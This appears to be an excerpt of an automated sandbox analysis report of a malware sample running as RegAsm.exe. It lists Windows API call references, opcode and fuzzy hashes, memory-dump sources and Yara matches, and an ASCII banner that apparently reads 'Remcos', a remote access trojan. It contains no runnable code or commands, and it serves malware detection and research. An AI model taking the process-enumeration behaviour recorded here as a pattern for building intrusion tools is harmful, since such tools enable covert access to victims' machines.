                                                                                                                                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                                                                      Strings
                                                                                                                                                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                      • API String ID: 3024135584-2418719853
                                                                                                                                                                      • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                      • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                                      • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                      • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                      • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                                      • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                      • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                      • _free.LIBCMT ref: 0044943D
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 00449609
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1286116820-0
                                                                                                                                                                      • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                      • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                                                      • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                        • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                                        • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                                                        • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                                                                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2180151492-0
                                                                                                                                                                      • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                      • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                      • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                                                      • __freea.LIBCMT ref: 0045129D
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                      • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                      • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                                      • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                      • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                      • _free.LIBCMT ref: 100071B8
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                                      • _free.LIBCMT ref: 0044F43F
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                      • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                      • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                                      • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                      • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                      • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                      • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                      • _free.LIBCMT ref: 00448353
                                                                                                                                                                      • _free.LIBCMT ref: 0044837A
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                      • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 100091D0
                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                      • _free.LIBCMT ref: 100091E2
                                                                                                                                                                      • _free.LIBCMT ref: 100091F4
                                                                                                                                                                      • _free.LIBCMT ref: 10009206
                                                                                                                                                                      • _free.LIBCMT ref: 10009218
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00450A54
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 00450A66
                                                                                                                                                                      • _free.LIBCMT ref: 00450A78
                                                                                                                                                                      • _free.LIBCMT ref: 00450A8A
                                                                                                                                                                      • _free.LIBCMT ref: 00450A9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                      • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                      • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 1000536F
                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                      • _free.LIBCMT ref: 10005381
                                                                                                                                                                      • _free.LIBCMT ref: 10005394
                                                                                                                                                                      • _free.LIBCMT ref: 100053A5
                                                                                                                                                                      • _free.LIBCMT ref: 100053B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00444106
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 00444118
                                                                                                                                                                      • _free.LIBCMT ref: 0044412B
                                                                                                                                                                      • _free.LIBCMT ref: 0044413C
                                                                                                                                                                      • _free.LIBCMT ref: 0044414D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                      • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                                      • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                      • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                                      APIs
                                                                                                                                                                      • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                      • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                        • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                                                        • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                        • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
